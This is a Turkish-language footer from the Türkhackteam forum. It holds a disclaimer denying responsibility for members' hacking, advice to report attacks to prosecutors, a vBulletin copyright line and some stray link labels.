Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.



         

Powered by vBulletin® Copyright ©2000 - 2019

TSK Mehmetçik Vakfı

Türk Polis Teşkilatını Güçlendirme Vakfı

Google+
Pomeranian Boo
instagram takipci hilesi

wau